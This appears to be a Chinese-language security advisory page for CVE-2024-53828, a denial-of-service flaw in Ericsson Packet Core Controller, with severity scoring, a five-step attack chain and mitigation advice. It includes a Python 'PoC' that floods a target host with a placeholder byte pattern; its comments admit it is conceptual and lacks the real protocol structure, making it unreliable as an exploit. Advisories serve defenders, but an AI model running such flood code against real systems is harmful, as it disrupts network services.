IPBUF安全漏洞报告
English
CVE-2024-53828 CVSS 5.3 中危

CVE-2024-53828 Ericsson PCC服务降级漏洞

披露日期: 2026-04-01
来源: 85b1779b-6ecd-4f52-bcc5-73eac4659dcf

漏洞信息

漏洞编号
CVE-2024-53828
漏洞类型
拒绝服务
CVSS评分
5.3 中危
攻击向量
邻接 (AV:A)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
Ericsson Packet Core Controller (PCC)

相关标签

拒绝服务DoSEricssonPacket Core ControllerCVE-2024-53828资源耗尽

漏洞概述

Ericsson Packet Core Controller (PCC) 1.38之前的版本存在安全漏洞。未经认证的攻击者可利用邻接网络发送大量特制消息,导致系统资源耗尽,引发服务严重降级或拒绝服务,直接影响网络可用性。

技术细节

该漏洞存在于Ericsson Packet Core Controller (PCC)的协议消息处理模块中。由于系统在处理特定类型的网络消息时,未对输入流量进行严格的速率限制和深度包检测,导致存在资源耗尽风险。攻击者无需任何用户交互或身份认证,即可利用邻接网络连接(AV:A),向受影响的PCC设备发送海量且经过特殊构造的恶意消息。这种攻击利用了系统在高负载场景下的逻辑缺陷,导致CPU利用率飙升或内存资源被耗尽。尽管攻击触发需要较高的网络访问复杂度(AC:H),但一旦攻击成功,将直接导致目标设备的服务性能严重下降,甚至完全中断,从而影响核心网络的正常运行。

攻击链分析

STEP 1
侦察
攻击者识别网络中的Ericsson Packet Core Controller (PCC)设备及其接口。
STEP 2
构建恶意消息
攻击者根据PCC协议特征,构造能够消耗系统资源的大量特制消息数据包。
STEP 3
发起攻击
攻击者无需认证,通过邻接网络向目标PCC设备发送海量恶意消息。
STEP 4
资源耗尽
目标设备因处理大量异常请求,导致CPU或内存资源耗尽。
STEP 5
服务降级
PCC设备无法响应正常业务请求,导致服务严重降级或拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import socket import time # Conceptual Proof of Concept for CVE-2024-53828 # This script simulates sending crafted messages to cause service degradation. # Note: Actual protocol details depend on Ericsson PCC implementation. def send_flood(target_ip, target_port, count): """ Sends a large volume of crafted messages to the target. """ # Example crafted payload (hex representation) # This is a placeholder; real exploitation requires specific protocol structure. crafted_message = b"\x00\x01\x02\x03\x04\x05" * 100 try: for i in range(count): # Create a socket (SOCK_STREAM or SOCK_DGRAM depending on protocol) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(2) try: s.connect((target_ip, target_port)) print(f"[+] Sending packet {i+1}/{count}") s.sendall(crafted_message) except Exception as e: print(f"[-] Error sending packet: {e}") finally: s.close() except KeyboardInterrupt: print("[!] Stopping attack.") if __name__ == "__main__": # Replace with actual target IP and Port TARGET_IP = "192.168.1.100" TARGET_PORT = 8080 PACKET_COUNT = 10000 print(f"[*] Starting flood on {TARGET_IP}:{TARGET_PORT}") send_flood(TARGET_IP, TARGET_PORT, PACKET_COUNT) print("[*] Flood completed.")

影响范围

Ericsson Packet Core Controller (PCC) < 1.38

防御指南

临时缓解措施
建议立即升级至修复版本。若无法立即升级,应在网络层面限制对PCC设备的访问来源,仅允许可信的邻接网络节点连接,并配置流量清洗设备以缓解潜在的DoS攻击。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表